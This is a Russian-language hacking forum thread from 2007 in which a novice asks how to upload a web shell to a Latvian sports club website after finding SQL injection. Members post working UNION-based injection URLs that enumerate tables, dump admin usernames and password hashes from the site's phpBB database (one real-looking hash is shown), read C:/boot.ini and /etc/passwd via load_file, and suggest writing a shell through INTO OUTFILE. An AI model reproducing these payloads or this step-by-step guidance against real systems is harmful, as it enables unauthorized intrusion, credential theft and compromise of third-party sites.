PDA

Просмотр полной версии : Помогите залить шелл

br1tva
26.12.2007, 19:30
Доброе время суток. Значит так , дело было вечером и делать естественно было нечего.
И после просмотра очередного видео о SQL inj и заливе шела я решил попробывать это сам.
Первое что я сделал нашол жертву своих коварных замыслов:
После того как жертва была найдена я проверил саит на наличие скуля:

http://www.site.lv/?p=news&off=&id=10`4
Ура скуль найден.

Далие нахожу количество полей...
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,3,4,5,6/*

Потом смотрю название и версию БД....
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,version(),4,5,6/*
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,database(),4,5,6/*
Получил версию : 5.0.21-community-nt
и название ДБ : xxx

Теперь было бы неплохо найти узеров + их пароли к адм панели саита...
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,user,4,5,6+from+users/*
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,pass,4,5,6+from+users/*
И тут опять же удача мне улыбнулась и после этих 2 запросов я получил 3 узернаме и пароли к ним.

Зайдя в адм панель ничего интересного я там ненашол кроме ДОБАВИТЙ ИЗМЕНИТЙ УДАЛИТЙ новости.... это меня огарчило и на некоторе время загнало в тупик , так как незнал што делатй дальше..
Немного подумав решил наити таблици в ДБ и составил такои запрос:
http://www.site.lv/?p=news&off=&id=-1045+UNION+SELECT+1,2,table_name,4,5,6+from+inform ation_schema.tables/*
После этого запроса получил название всех таблиц:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words
countries
countries_
matches
matches2005
matches2006
matches2007
news
players
players_
positions
teams
teams_
users
visit

И на этом я остановился ,так как незнаю что необходимо сделать дальше для того что би залить шелл...
Может ктонибудь мог бы мне немного подсказать ....

P.S Hе судите меня строго , я весго лиш новичок...
AFoST
26.12.2007, 19:33
Попробуй к фтп подконнектиться =)
ftp://user:password@site.lv
159932
26.12.2007, 19:33
ну так залезай в phpbb_users доставай хеши админов - бруть их - залезай в админку - и сливай базу ...
delay(0)
26.12.2007, 19:33
Выводи логин и пасс админа из phpbb_users, расшифровывай хеш, заливай шелл. ;)
br1tva
26.12.2007, 19:34
ну так залезай в phpbb_users доставай хеши админов - бруть их - залезай в админку - и сливай базу ...

А можно немного поподробней... ? Какой нужен запрос ???
159932
26.12.2007, 19:39
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,concat(username,0x3a,user_pas sword),4,5,6+from+phpbb_users/*
Nea7
26.12.2007, 19:43
http://www.site.lv/?p=news&off=&id=-1045+UNION+SELECT+1,2,concat_ws(0x3a,username,user _password,user_email,user_icq),4,5,6+from+fkvbb.ph pbb_users/* =\
AFoST
26.12.2007, 19:47
Nea7, палево :-D
br1tva
26.12.2007, 22:25
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,concat(username,0x3a,user_pas sword),4,5,6+from+phpbb_users/*

Сделав такой запрос получил такой erorr:
Table 'fkventspils.phpbb_users' doesn't exist

А почему fkventspils.phpbb_users если в моём запросе phpbb_users?

Форум находится http://www.site.lv/forum/
Может это как то влияет ?
delay(0)
27.12.2007, 01:53
А почему fkventspils.phpbb_users если в моём запросе phpbb_users?
Автоматически подставляется текущая бд, а именно fkventspils. А бд форума называется по другому.
http://www.fkve****.lv/?p=news&off=&id=-104+union+select+1,2,table_schema,4,5,6+from+infor mation_schema.tables+where+table_name=0x7068706262 5f7573657273+limit+0,1/*
Вот и узнали, что данные форума лежат у нас в fkvbb.
Составляем запрос:
http://www.fkve****.lv/?p=news&off=&id=-104+union+select+1,2,concat_ws(0x3a,username,user_ password),4,5,6+from+fkvbb.phpbb_users+limit+1,1/*
Andruxa:7fee56ff9519fdc6c473dee675c4b003
и т.д. лимитом. (;
Spyder
27.12.2007, 12:04
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/*
попробуй так
br1tva
28.12.2007, 00:02
delay(0) Thanks . )
Токо вот как ты получил 0x70687062625f7573657273 ?
delay(0)
28.12.2007, 15:11
Токо вот как ты получил 0x70687062625f7573657273 ?
Перевел название таблицы в hex.
iddqd
28.12.2007, 16:28
Если есть привилегии file_priv, то мона залить шелл скулем через INTO OUTFILE. А коль есть ПхпББ, то через него конечно удобнее. Как? А вот так:
https://forum.antichat.ru/showpost.php?p=198446&postcount=3
br1tva
28.12.2007, 19:40
Если есть привилегии file_priv, то мона залить шелл скулем через INTO OUTFILE. А коль есть ПхпББ, то через него конечно удобнее. [/U]

А можно немного поподробней об file_priv ...???

А то немогу расхешировать пароль Админа на phpBB.... :mad:
Macro
28.12.2007, 20:15
короче если прокатит http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/*
либо
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('/etc/passwd'),4,5,6/*

То file_priv есть, иначе его нет :)
Scipio
28.12.2007, 20:21
короче если прокатит http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/*
либо
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('/etc/passwd'),4,5,6/*

То file_priv есть, иначе его нет :)

тогда уж http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file(0x433A2F626F6F742E6 96E69),4,5,6/*

так надежней, к тому же как я понял серв виндовый:
Получил версию : 5.0.21-community-nt